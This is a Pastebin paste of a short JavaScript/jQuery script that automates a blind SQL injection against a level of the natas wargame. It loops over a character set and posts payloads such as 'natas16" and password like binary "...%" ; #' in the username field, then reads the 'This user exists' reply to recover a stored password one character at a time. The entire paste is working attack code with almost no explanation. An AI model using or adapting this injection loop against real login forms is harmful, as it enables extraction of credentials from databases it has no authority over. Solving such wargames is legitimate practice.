Guest User

Untitled

a guest
Sep 13th, 2017
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.96 KB | None | 0 0
  1. //'natas16" and password like "[0-9]_______________________________" ; #'
  2. //created by ashishrana.7890@gmail.com
  3. $("#viewsource").text('');
  4. var i,j=0;
  5. var ch;
  6. var pl;
  7. var ch_set="ABCEHIJMNOPQRTWabcehijmnopqrtw03569"; // found this char set by running char_find.js
  8. var pass="";
  9. var found=0;
  10. var head_t="";
  11. for(j=1;j<=32;j++)
  12. {
  13. head_t=33-j+" char left";
  14. $("h1").text(head_t);
  15. for(i=0;i<35;i++)
  16. {
  17. found=0;
  18. ch=ch_set[i];
  19. pl='natas16" and password like binary "'+pass+ch+'%" ; #';
  20. $("#viewsource").html(pass+"<span style='color:white;background:black;'><b>"+ch+"</b></span>");
  21. $.ajax({
  22. type: 'POST',
  23. url: "index.php",
  24. data: {username:pl},
  25. success: function(data){
  26. if(data.indexOf("This user exists")>0)
  27. {$("#viewsource").text(pass);
  28. pass=pass+ch;
  29. found=1;
  30. }
  31.  
  32. },
  33. async:false
  34. });
  35. if(found==1)break;
  36. }
  37. if(found==0)pass=pass+'_';
  38. }
  39. alert(pass);
Add Comment
Please, Sign In to add comment